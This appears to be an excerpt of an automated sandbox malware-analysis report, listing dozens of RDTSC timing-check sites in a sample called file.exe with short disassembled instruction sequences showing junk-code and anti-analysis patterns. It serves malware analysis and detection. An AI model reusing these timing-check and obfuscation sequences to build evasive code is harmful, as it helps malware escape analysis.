                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DB3F second address: A0DB49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0C44E7DD66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47516 second address: A4751A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47684 second address: A47689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47689 second address: A47699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0C44D4E186h 0x0000000a jng 00007F0C44D4E186h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47699 second address: A476B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0C44E7DD99h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A476B4 second address: A476B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A476B8 second address: A476BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A476BC second address: A476C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A476C2 second address: A476CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47AF8 second address: A47B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0C44D4E192h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47B11 second address: A47B17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D965 second address: A4D970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D970 second address: A4D974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D974 second address: A4D97E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0C44D4E186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C2F3 second address: A4C337 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44E7DD66h 0x00000008 jmp 00007F0C44E7DD6Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0C44E7DD72h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0C44E7DD79h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C337 second address: A4C35B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0C44D4E196h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F0C44D4E188h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C5F1 second address: A4C5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C5FA second address: A4C5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CD18 second address: A4CD57 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44E7DD66h 0x00000008 jmp 00007F0C44E7DD76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F0C44E7DD7Fh 0x00000015 jmp 00007F0C44E7DD77h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D1A6 second address: A4D207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E199h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edi 0x0000000d jmp 00007F0C44D4E198h 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F0C44D4E18Ch 0x0000001c jl 00007F0C44D4E186h 0x00000022 pushad 0x00000023 jmp 00007F0C44D4E18Eh 0x00000028 pushad 0x00000029 popad 0x0000002a js 00007F0C44D4E186h 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5173A second address: A5173E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53C06 second address: A53C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44D4E190h 0x00000009 jmp 00007F0C44D4E191h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53C2B second address: A53C31 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53C31 second address: A53C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0C44D4E1B2h 0x0000000e jmp 00007F0C44D4E192h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53C55 second address: A53C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D510D second address: 9D5111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5111 second address: 9D5117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56A37 second address: A56A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56A3C second address: A56A75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F0C44E7DD66h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007F0C44E7DD79h 0x00000012 js 00007F0C44E7DD66h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56A75 second address: A56A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E193h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56A8C second address: A56AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0C44E7DD77h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A565BD second address: A565C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0C44D4E186h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A565C7 second address: A565DF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44E7DD66h 0x00000008 jbe 00007F0C44E7DD66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F0C44E7DD85h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A565DF second address: A56608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E199h 0x00000009 popad 0x0000000a jbe 00007F0C44D4E1AEh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56608 second address: A56625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0C44E7DD66h 0x0000000a jmp 00007F0C44E7DD6Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A8D6 second address: A5A8FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a jmp 00007F0C44D4E18Dh 0x0000000f popad 0x00000010 jc 00007F0C44D4E1C3h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A8FA second address: A5A8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A8FE second address: A5A902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AA76 second address: A5AA80 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0C44E7DD66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AA80 second address: A5AA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0C44D4E196h 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AA9E second address: A5AAB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD72h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AAB6 second address: A5AAC6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AAC6 second address: A5AAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F0C44E7DD66h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AFAB second address: A5AFB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AFB1 second address: A5AFBF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F0C44E7DD66h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AFBF second address: A5AFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B0E9 second address: A5B0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B0EF second address: A5B0F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B0F3 second address: A5B0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0C44E7DD66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B0FF second address: A5B11B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44D4E192h 0x00000009 jne 00007F0C44D4E186h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B11B second address: A5B138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0C44E7DD73h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B138 second address: A5B13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B13E second address: A5B142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60231 second address: A60237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60237 second address: A6023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6023B second address: A60264 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F0C44D4E186h 0x00000010 jmp 00007F0C44D4E199h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60552 second address: A6055E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0C44E7DD66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6055E second address: A60577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44D4E193h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60577 second address: A6057B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A606CD second address: A606DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E18Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60828 second address: A60859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0C44E7DD66h 0x00000009 jmp 00007F0C44E7DD73h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0C44E7DD6Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60859 second address: A6085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6085D second address: A60878 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F0C44E7DD75h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60878 second address: A60884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F0C44D4E186h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A609DD second address: A609E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A609E1 second address: A609EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A609EC second address: A609F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A609F4 second address: A60A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E18Bh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F0C44D4E195h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D3E2 second address: A0D3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D3E7 second address: A0D3F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0C44D4E18Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D3F6 second address: A0D431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, edi 0x0000000c mov ebx, dword ptr [ebp+1246E53Ah] 0x00000012 mov edx, dword ptr [ebp+122D2B8Bh] 0x00000018 add eax, ebx 0x0000001a mov dword ptr [ebp+122D1BC1h], edi 0x00000020 push eax 0x00000021 push edi 0x00000022 pushad 0x00000023 jmp 00007F0C44E7DD76h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D431 second address: A0D49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F0C44D4E188h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 stc 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F0C44D4E188h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 stc 0x00000041 mov ecx, dword ptr [ebp+122D2DE7h] 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F0C44D4E18Eh 0x00000050 push esi 0x00000051 pop esi 0x00000052 popad 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60B6F second address: A60B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F0C44E7DD6Eh 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F0C44E7DD66h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61751 second address: A61757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61757 second address: A61771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F0C44E7DD75h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64915 second address: A6491B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6491B second address: A64924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64924 second address: A6492A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6492A second address: A64930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64241 second address: A64245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64245 second address: A6424F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44C1C9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69873 second address: A698AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jg 00007F0C44CFD9A6h 0x0000000b pop esi 0x0000000c jmp 00007F0C44CFD9AEh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0C44CFD9B7h 0x0000001b jp 00007F0C44CFD9A6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69ED9 second address: A69EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44C1C9F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jc 00007F0C44C1C9EEh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69EFA second address: A69F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A169 second address: A6A179 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0C44C1C9E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A179 second address: A6A17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A47E second address: A6A482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A482 second address: A6A492 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F0C44CFD9A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A492 second address: A6A498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A498 second address: A6A49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6ACB8 second address: A6ACDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44C1C9F9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6B2A9 second address: A6B2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44CFD9B5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6B2C2 second address: A6B2D6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44C1C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0C44C1C9E6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70129 second address: A70139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44CFD9AAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70139 second address: A7013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7013F second address: A70143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
